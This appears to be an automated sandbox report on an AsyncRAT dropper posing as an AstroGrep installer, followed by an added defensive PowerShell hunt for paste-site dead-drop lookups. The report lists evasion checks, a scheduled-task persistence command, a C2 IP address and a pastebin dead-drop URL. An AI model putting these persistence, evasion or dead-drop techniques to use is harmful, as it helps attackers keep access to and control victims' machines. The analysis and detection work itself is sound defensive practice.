Source: Yara match | File source: 3.2.ASTRO-GREP.EXE.2a4e31c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a3f330.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ms.exe.a3f330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a30000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ms.exe.a3f330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.250713765.0000000002A4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.253043295.0000000000772000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.197769647.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.250001680.00000000005F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.195464436.0000000000A3F000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.310239259.0000000000432000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.259955019.0000000000432000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.460832273.0000000000772000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: astro-grep.exe PID: 748, type: MEMORY
Source: Yara match | File source: Process Memory Space: astro-grep.exe PID: 2792, type: MEMORY
Source: Yara match | File source: Process Memory Space: ASTRO-GREP.EXE PID: 5416, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\astro-grep.exe, type: DROPPED

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: astro-grep.exe, ms.exe | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\NLog.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.exe
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\libAstroGrep.dll
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Dropped PE file which has not been started: C:\Program Files (x86)\AstroGrep\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE TID: 6128 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\astro-grep.exe TID: 4840 | Thread sleep time: -45000s >= -30000s
Source: C:\Users\user\AppData\Roaming\astro-grep.exe TID: 4920 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File Volume queried: C:\Program Files (x86) FullSizeInformation
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Code function: 5_2_00406033 FindFirstFileA,FindClose,5_2_00406033
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Code function: 5_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055D1
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Code function: 5_2_00402688 FindFirstFileA,5_2_00402688
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ms.exe | Binary or memory string: vmware
Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: astro-grep.exe, 0000000D.00000002.465070597.00000000050B0000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ASTRO-GREP.EXE, 00000003.00000002.251607901.0000000005580000.00000002.00000001.sdmp, astro-grep.exe, 0000000D.00000002.465209540.0000000005630000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Code function: 3_2_00F2BC64 CheckRemoteDebuggerPresent,3_2_00F2BC64
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A33BEC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A33BEC
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A36260 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00A36260
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A34991 SetUnhandledExceptionFilter,1_2_00A34991
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A32701 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A32701
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\ms.exe | Process created: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE 'C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE'
Source: C:\Users\user\Desktop\ms.exe | Process created: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE 'C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE'
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe'' & exit
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat''
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'astro-grep' /tr ''C:\Users\user\AppData\Roaming\astro-grep.exe''
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\astro-grep.exe 'C:\Users\user\AppData\Roaming\astro-grep.exe'
Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: astro-grep.exe, 0000000D.00000002.461901271.0000000001490000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Queries volume information: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Queries volume information: C:\Users\user\AppData\Roaming\astro-grep.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\astro-grep.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\ms.exe | Code function: 1_2_00A35173 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00A35173
Source: C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | Code function: 5_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,5_2_00405D51
Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation1 | Scheduled Task/Job2 | Access Token Manipulation1 | Disable or Modify Tools1 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
Default Accounts | Scripting1 | Registry Run Keys / Startup Folder1 | Process Injection12 | Scripting1 | LSASS Memory | File and Directory Discovery3 | Remote Desktop Protocol | Clipboard Data1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Native API1 | Logon Script (Windows) | Scheduled Task/Job2 | Obfuscated Files or Information111 | Security Account Manager | System Information Discovery26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter2 | Logon Script (Mac) | Registry Run Keys / Startup Folder1 | Software Packing11 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Scheduled Task/Job2 | Network Logon Script | Network Logon Script | Masquerading2 | LSA Secrets | Security Software Discovery231 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol2 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion41 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation1 | DCSync | Virtualization/Sandbox Evasion41 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection12 | Proc Filesystem | Remote System Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

Behavior Graph

Behavior Graph ID: 450276, Sample: ms.bin, Startdate: 17/07/2021, Architecture: WINDOWS, Score: 52
Signatures on the sample node: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected AsyncRAT; 5 other signatures

Process tree recovered from the graph (edges read from the node list above; "dropped" and "started" are the graph's own edge labels):

ms.exe (started)
  dropped: C:\Users\user\AppData\...\ASTRO-GREP.EXE, PE32
  dropped: C:\Users\user\...\ASTROGREP_SETUP_V4.4.7.EXE, PE32
  ASTRO-GREP.EXE (started)
    dropped: C:\Users\user\AppData\...\astro-grep.exe, PE32
    signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
    cmd.exe (started)
      signature: Uses schtasks.exe or at.exe to add and modify task schedules
      conhost.exe (started)
      schtasks.exe (started)
    cmd.exe (started)
      astro-grep.exe (started)
      conhost.exe (started)
      timeout.exe (started)
  ASTROGREP_SETUP_V4.4.7.EXE (started)
    dropped: C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32
    dropped: C:\Users\user\AppData\Local\...\System.dll, PE32
    dropped: C:\Users\user\AppData\Local\...\StartMenu.dll, PE32
    dropped: 8 other files (none is malicious)
astro-grep.exe (started from the sample node)
  network: 185.195.232.251, ports 49728, 49729, 49735, ESAB-ASSE Sweden
  network: pastebin.com 104.23.98.190, port 443, 49727, CLOUDFLARENETUS United States
  signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
ms.exe | 78% | Virustotal |
ms.exe | 100% | Avira | TR/Dropper.Gen
ms.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\astro-grep.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\astro-grep.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe | 0% | Virustotal |
C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe | 0% | Metadefender |
C:\Program Files (x86)\AstroGrep\AstroGrep.AdminProcess.exe | 0% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll | 0% | Metadefender |
C:\Program Files (x86)\AstroGrep\AstroGrep.Common.dll | 0% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\AstroGrep.exe | 2% | Metadefender |
C:\Program Files (x86)\AstroGrep\AstroGrep.exe | 0% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll | 0% | Metadefender |
C:\Program Files (x86)\AstroGrep\ICSharpCode.AvalonEdit.dll | 0% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\NLog.dll | 0% | Metadefender |
C:\Program Files (x86)\AstroGrep\NLog.dll | 0% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\Uninstall.exe | 5% | Metadefender |
C:\Program Files (x86)\AstroGrep\Uninstall.exe | 2% | ReversingLabs |
C:\Program Files (x86)\AstroGrep\libAstroGrep.dll | 0% | Metadefender |
C:\Program Files (x86)\AstroGrep\libAstroGrep.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | 5% | Metadefender |
C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE | 4% | ReversingLabs |

                            Unpacked PE Files

Source | Detection | Scanner | Label
3.0.ASTRO-GREP.EXE.5f0000.0.unpack | 100% | Avira | TR/Dropper.Gen
3.2.ASTRO-GREP.EXE.5f0000.0.unpack | 100% | Avira | TR/Dropper.Gen
17.2.astro-grep.exe.430000.0.unpack | 100% | Avira | TR/Dropper.Gen
13.2.astro-grep.exe.770000.0.unpack | 100% | Avira | TR/Dropper.Gen
1.0.ms.exe.a30000.0.unpack | 100% | Avira | TR/Dropper.Gen
17.0.astro-grep.exe.430000.0.unpack | 100% | Avira | TR/Dropper.Gen
1.0.ms.exe.a4b130.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.0.astro-grep.exe.770000.0.unpack | 100% | Avira | TR/Dropper.Gen
3.2.ASTRO-GREP.EXE.2a4e31c.2.unpack | 100% | Avira | HEUR/AGEN.1110362
1.2.ms.exe.a4b130.3.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.2.ms.exe.a30000.1.unpack | 100% | Avira | TR/Dropper.Gen

                            Domains

                            No Antivirus matches

                            URLs

Source | Detection | Scanner | Label
https://pastebin.com43l | 0% | Avira URL Cloud | safe
https://pastebin.comD83l | 0% | Avira URL Cloud | safe
https://pastebin.comD83lh; | 0% | Avira URL Cloud | safe
http://schemas.microsof | 0% | URL Reputation | safe
http://schemas.microsof | 0% | URL Reputation | safe
http://schemas.microsof | 0% | URL Reputation | safe
http://schemas.microsof | 0% | URL Reputation | safe

                            Domains and IPs

                            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastebin.com | 104.23.98.190 | true | false | | high

                              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://pastebin.com43l | astro-grep.exe, 0000000D.00000002.462183818.0000000002B36000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008 | ICSharpCode.AvalonEdit.dll.5.dr | false | | high
http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error | ICSharpCode.AvalonEdit.dll.5.dr | false | | high
http://icsharpcode.net/sharpdevelop/avalonedit | ICSharpCode.AvalonEdit.dll.5.dr | false | | high
https://pastebin.com/raw | astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmp | false | | high
https://pastebin.com/raw/VTByvKGM | astro-grep.exe, 00000011.00000002.310812731.0000000002781000.00000004.00000001.sdmp | false | | high
http://astrogrep.sourceforge.net/Ihttp://www.gnu.org/copyleft/gpl.html | AstroGrep.exe.5.dr | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | NLog.dll.5.dr | false | | high
https://pastebin.comD83l | astro-grep.exe, 0000000D.00000002.462364002.0000000002CB8000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462336171.0000000002C73000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462353763.0000000002C96000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462305606.0000000002C51000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://nlog-project.org/ | NLog.dll.5.dr | false | | high
https://pastebin.comD83lh; | astro-grep.exe, 0000000D.00000002.462235560.0000000002B82000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://nsis.sf.net/NSIS_ErrorError | ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000003.256251943.000000000074E000.00000004.00000001.sdmp, ms.exe | false | | high
https://www.nuget.org/packages/NLog.Web.AspNetCore | ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, NLog.dll.5.dr | false | | high
http://nlog-project.org/ws/T | NLog.dll.5.dr | false | | high
http://downloads.sourceforge.net/astrogrep/readme.txt | AstroGrep.exe.5.dr | false | | high
http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsep | NLog.dll.5.dr | false | | high
http://nsis.sf.net/NSIS_Error | ASTROGREP_SETUP_V4.4.7.EXE, ASTROGREP_SETUP_V4.4.7.EXE, 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp, ms.exe | false | | high
http://nlog-project.org/dummynamespace/ | NLog.dll.5.dr | false | | high
http://downloads.sourceforge.net/astrogrep/ | AstroGrep.exe.5.dr | false | | high
http://nlog-project.org/ws/ILogReceiverOneWayServer/ProcessLogMessages | NLog.dll.5.dr | false | | high
http://www.gnu.org/copyleft/gpl.html#SEC3 | AstroGrep.exe.5.dr | false | | high
http://astrogrep.sourceforge.net/download/ | AstroGrep.exe.5.dr | false | | high
http://astrogrep.sourceforge.net/version.htmlUhttp://astrogrep.sourceforge.net/download/Whttps://sou | AstroGrep.Common.dll.5.dr | false | | high
http://nlog-project.org/ws/ | NLog.dll.5.dr | false | | high
http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesT | NLog.dll.5.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ASTRO-GREP.EXE, 00000003.00000002.250692664.0000000002A34000.00000004.00000001.sdmp, astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmp | false | | high
http://pastebin.com | astro-grep.exe, 0000000D.00000002.462195742.0000000002B3F000.00000004.00000001.sdmp | false | | high
https://pastebin.com | astro-grep.exe, 0000000D.00000002.462172433.0000000002B2D000.00000004.00000001.sdmp | false | | high
http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting | ICSharpCode.AvalonEdit.dll.5.dr | false | | high
http://nlog-project.org/ws/3 | NLog.dll.5.dr | false | | high
http://schemas.microsof | astro-grep.exe | false | URL Reputation: safe (reported four times) | unknown
http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ | ICSharpCode.AvalonEdit.dll.5.dr | false | | high
http://nlog-project.org/ws/5 | NLog.dll.5.dr | false | | high
http://astrogrep.sourceforge.net | AstroGrep.exe.5.dr | false | | high
http://www.gnu.org/copyleft/gpl.html | AstroGrep.exe.5.dr | false | | high
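The https://pastebin.com/raw/VTByvKGM string recovered from astro-grep.exe memory above, and the pastebin.com/raw/... paths listed for related samples in the context tables further down, are the dead-drop pattern: the implant fetches its C2 address from a public paste instead of carrying it hard-coded. The PowerShell below is an added hunt for that behaviour; it is not part of the Joe Sandbox report and not code from the sample. It reads Sysmon Event ID 22 (DNS query) records and flags paste-site lookups made by processes that are not browsers. The paste-site list, the browser allow-list and the embedded sample records are constructed for this example; the only values taken from the page are the pastebin.com host name, its two Cloudflare addresses and the astro-grep.exe path.

```powershell
# Added hunt, not code from the Joe Sandbox report or the sample.
# Sysmon Event ID 22 (DnsQuery) must be enabled for the live path; the
# constructed records at the bottom let the filter run without Sysmon.

# Paste sites commonly used as dead-drop resolvers. Assumption; extend as needed.
$PasteHostPattern = '(?i)(^|\.)(pastebin\.com|paste\.ee|hastebin\.com|ghostbin\.com|rentry\.co)$'

# Processes for which a paste-site lookup is ordinary user activity. Assumption; tune per estate.
$BrowserImages = @('chrome.exe', 'msedge.exe', 'firefox.exe', 'iexplore.exe', 'brave.exe', 'opera.exe')

function Get-SysmonDnsEvents {
    # Read Sysmon DNS query events and project the EventData fields the hunt needs.
    param([datetime]$Since = (Get-Date).AddDays(-1))

    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 22
        StartTime = $Since
    } -ErrorAction Stop | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            UtcTime      = $data['UtcTime']
            Image        = $data['Image']
            ProcessId    = $data['ProcessId']
            QueryName    = $data['QueryName']
            QueryResults = $data['QueryResults']
        }
    }
}

function Find-PasteSiteLookups {
    # Keep paste-site queries from non-browser images and summarise them per image.
    param([Parameter(Mandatory)][object[]]$Events)

    $Events |
        Where-Object {
            ($_.QueryName -match $PasteHostPattern) -and
            ($BrowserImages -notcontains [IO.Path]::GetFileName($_.Image))
        } |
        Group-Object Image |
        ForEach-Object {
            [pscustomobject]@{
                Image       = $_.Name
                Lookups     = $_.Count
                FirstSeen   = ($_.Group.UtcTime | Sort-Object | Select-Object -First 1)
                QueryNames  = ($_.Group.QueryName | Sort-Object -Unique) -join ', '
                Resolved    = ($_.Group.QueryResults | Sort-Object -Unique) -join ' '
                # A binary under a user profile plus a paste-site lookup is the combination seen in this sample.
                UserProfile = [bool]($_.Name -match '(?i)\\Users\\[^\\]+\\AppData\\')
            }
        }
}

# Constructed sample records (not real telemetry). Only pastebin.com, its two
# Cloudflare IPs and the astro-grep.exe path come from the report; the rest is invented.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2021-07-17 20:37:30.101'; Image = 'C:\Program Files\Google\Chrome\Application\chrome.exe'; ProcessId = 4120; QueryName = 'pastebin.com';            QueryResults = '104.23.98.190;' }
    [pscustomobject]@{ UtcTime = '2021-07-17 20:37:41.552'; Image = 'C:\Users\user\AppData\Roaming\astro-grep.exe';           ProcessId = 5288; QueryName = 'pastebin.com';            QueryResults = '104.23.98.190;' }
    [pscustomobject]@{ UtcTime = '2021-07-17 20:38:02.007'; Image = 'C:\Users\user\AppData\Roaming\astro-grep.exe';           ProcessId = 5288; QueryName = 'pastebin.com';            QueryResults = '104.23.99.190;' }
    [pscustomobject]@{ UtcTime = '2021-07-17 20:38:15.300'; Image = 'C:\Windows\System32\svchost.exe';                         ProcessId = 1044; QueryName = 'ctldl.windowsupdate.com'; QueryResults = '203.0.113.10;' }
)

Find-PasteSiteLookups -Events $SampleEvents | Format-Table -AutoSize

# Live hunt over the last seven days (needs rights to read the Sysmon log):
# Find-PasteSiteLookups -Events (Get-SysmonDnsEvents -Since (Get-Date).AddDays(-7))
```

The filter keys on the process image rather than on the paste ID, because the paste path changes from campaign to campaign (three different raw IDs appear in the context tables alone) while "non-browser process in a user profile talks to a paste site" stays constant. A browser allow-list is the weak point of the check: a browser spawned with a paste URL as argument would pass it, so pair it with a process-creation (Sysmon ID 1) review of anything that launches a browser from AppData.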

                                                                                            Contacted IPs


                                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.195.232.251 | unknown | Sweden | 39351 | ESAB-ASSE | false
104.23.98.190 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | false

